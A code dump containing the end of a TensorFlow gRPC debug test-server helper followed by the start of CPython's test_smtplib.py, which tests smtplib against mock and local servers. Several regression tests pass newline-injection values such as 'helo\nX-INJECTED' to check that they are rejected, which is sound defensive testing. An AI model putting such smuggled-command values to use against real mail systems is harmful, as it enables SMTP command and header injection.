return self._code_def_to_traceback(log_entry.code_def,
op_log_proto.id_to_string)
raise ValueError(
"Op '%s' does not exist in the tracebacks received by the debug "
"server." % op_name)
def query_origin_stack(self):
"""Query the stack of the origin of the execution call.
Returns:
A `list` of all tracebacks. Each item corresponds to an execution call,
i.e., a `SendTracebacks` request. Each item is a `list` of 3-tuples:
(filename, lineno, function_name).
"""
ret = []
for stack, id_to_string in zip(
self._origin_stacks, self._origin_id_to_strings):
ret.append(self._code_def_to_traceback(stack, id_to_string))
return ret
def query_call_types(self):
return self._call_types
def query_call_keys(self):
return self._call_keys
def query_graph_versions(self):
return self._graph_versions
def query_source_file_line(self, file_path, lineno):
"""Query the content of a given line in a source file.
Args:
file_path: Path to the source file.
lineno: Line number as an `int`.
Returns:
Content of the line as a string.
Raises:
ValueError: If no source file is found at the given file_path.
"""
for source_file_proto in self._source_files.source_files:
if source_file_proto.file_path == file_path:
return source_file_proto.lines[lineno - 1]
raise ValueError(
"Source file at path %s has not been received by the debug server" %
file_path)
def _code_def_to_traceback(self, code_def, id_to_string):
return [(id_to_string[trace.file_id],
trace.lineno,
id_to_string[trace.function_id]) for trace in code_def.traces]
def start_server_on_separate_thread(dump_to_filesystem=True,
server_start_delay_sec=0.0,
poll_server=False,
blocking=True,
toggle_watch_on_core_metadata=None):
"""Create a test gRPC debug server and run on a separate thread.
Args:
dump_to_filesystem: (bool) whether the debug server will dump debug data
to the filesystem.
server_start_delay_sec: (float) amount of time (in sec) to delay the server
start up for.
poll_server: (bool) whether the server will be polled till success on
startup.
blocking: (bool) whether the server should be started in a blocking mode.
toggle_watch_on_core_metadata: A list of
(node_name, output_slot, debug_op) tuples to toggle the
watchpoint status during the on_core_metadata calls (optional).
Returns:
server_port: (int) Port on which the server runs.
debug_server_url: (str) grpc:// URL to the server.
server_dump_dir: (str) The debug server's dump directory.
server_thread: The server Thread object.
server: The `EventListenerTestServicer` object.
Raises:
ValueError: If polling the server process for ready state is not successful
within maximum polling count.
"""
server_port = portpicker.pick_unused_port()
debug_server_url = "grpc://localhost:%d" % server_port
server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None
server = EventListenerTestServicer(
server_port=server_port,
dump_dir=server_dump_dir,
toggle_watch_on_core_metadata=toggle_watch_on_core_metadata)
def delay_then_run_server():
time.sleep(server_start_delay_sec)
server.run_server(blocking=blocking)
server_thread = threading.Thread(target=delay_then_run_server)
server_thread.start()
if poll_server:
if not _poll_server_till_success(
50,
0.2,
debug_server_url,
server_dump_dir,
server,
gpu_memory_fraction=0.1):
raise ValueError(
"Failed to start test gRPC debug server at port %d" % server_port)
server.clear_data()
return server_port, debug_server_url, server_dump_dir, server_thread, server
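# Usage sketch (added comment; `stop_server()` is assumed to be provided by
# grpc_debug_server.EventListenerBaseServicer):
#
#   port, url, dump_dir, thread, server = start_server_on_separate_thread()
#   ...  # point RunOptions debug_urls at `url` and run the graph under test
#   server.stop_server().wait()
#   thread.join()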
def _poll_server_till_success(max_attempts,
sleep_per_poll_sec,
debug_server_url,
dump_dir,
server,
gpu_memory_fraction=1.0):
"""Poll server until success or exceeding max polling count.
Args:
max_attempts: (int) How many times to poll at maximum
sleep_per_poll_sec: (float) How many seconds to sleep for after each
unsuccessful poll.
debug_server_url: (str) gRPC URL to the debug server.
dump_dir: (str) Dump directory to look for files in. If None, will directly
check data from the server object.
server: The server object.
gpu_memory_fraction: (float) Fraction of GPU memory to be
allocated for the Session used in server polling.
Returns:
(bool) Whether the polling succeeded within max_polls attempts.
"""
poll_count = 0
config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions(
per_process_gpu_memory_fraction=gpu_memory_fraction))
with session.Session(config=config) as sess:
for poll_count in range(max_attempts):
server.clear_data()
print("Polling: poll_count = %d" % poll_count)
x_init_name = "x_init_%d" % poll_count
x_init = constant_op.constant([42.0], shape=[1], name=x_init_name)
x = variables.Variable(x_init, name=x_init_name)
run_options = config_pb2.RunOptions()
debug_utils.add_debug_tensor_watch(
run_options, x_init_name, 0, debug_urls=[debug_server_url])
try:
sess.run(x.initializer, options=run_options)
except errors.FailedPreconditionError:
pass
if dump_dir:
if os.path.isdir(
dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0:
shutil.rmtree(dump_dir)
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
else:
if server.debug_tensor_values:
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
return False
|
test_smtplib.py
|
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import _asyncore as asyncore
from test.support import _smtpd as smtpd
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_helper
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
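# Helper (comment added): a minimal TCP server used by tests in this module.
# It accepts a single connection, pushes `buf` to the client in a bounded
# select() loop, and signals `evt` both when listening starts and when done.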
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except TimeoutError:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except TimeoutError:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
threading_helper.join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testEHLO(self):
# EHLO is handled by smtpd.SMTPChannel; check the advertised extensions
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def test_issue43124_putcmd_escapes_newline(self):
# see: https://bugs.python.org/issue43124
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.putcmd('helo\nX-INJECTED')
self.assertIn("prohibited newline characters", str(exc.exception))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('[email protected]'), expected)
self.assertEqual(smtp.verify('[email protected]'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def test_issue43124_escape_localhostname(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='hi\nX-INJECTED',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.sendmail("[email protected]", "[email protected]", m)
self.assertIn(
"prohibited newline characters: ehlo hi\\nX-INJECTED",
str(exc.exception),
)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-INJECTED", debugout)
def test_issue43124_escape_options(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail("[email protected]", "[email protected]", m)
with self.assertRaises(ValueError) as exc:
smtp.mail("[email protected]", ["X-OPTION\nX-INJECTED-1", "X-OPTION2\nX-INJECTED-2"])
msg = str(exc.exception)
self.assertIn("prohibited newline characters", msg)
self.assertIn("X-OPTION\\nX-INJECTED-1 X-OPTION2\\nX-INJECTED-2", msg)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-OPTION", debugout)
self.assertNotIn("X-OPTION2", debugout)
self.assertNotIn("X-INJECTED-1", debugout)
self.assertNotIn("X-INJECTED-2", debugout)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<[email protected]>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='[email protected]', to_addrs='[email protected]')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'[email protected]'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = '[email protected]'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: [email protected]$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('[email protected]', 'Jeff', '[email protected]'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = '[email protected]'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <[email protected]>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = '[email protected]'
m['Resent-To'] = 'Martha <[email protected]>, Jeff'
m['Resent-Bcc'] = '[email protected]'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = '[email protected]'
m['Resent-From'] = 'Martha <[email protected]>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
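# Tests that exercise SMTP objects without connecting to any server.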
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
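# Check the mail options that send_message() adds by default when the message
# contains non-ASCII addresses (SMTPUTF8 and BODY=8BITMIME).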
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <fő[email protected]>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
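# Check that a server response longer than smtplib._MAXLINE raises
# SMTPResponseException.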
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_helper.threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
threading_helper.join_thread(self.thread)
del self.thread
self.doCleanups()
threading_helper.threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
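# Canned account and mailing-list data used by the simulated SMTP server below.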
sim_users = {'[email protected]':'John A',
'[email protected]':'Sally B',
'[email protected]':'Ruth C',
}
sim_auth = ('[email protected]', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['[email protected]','[email protected]'],
'list-2':['[email protected]',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
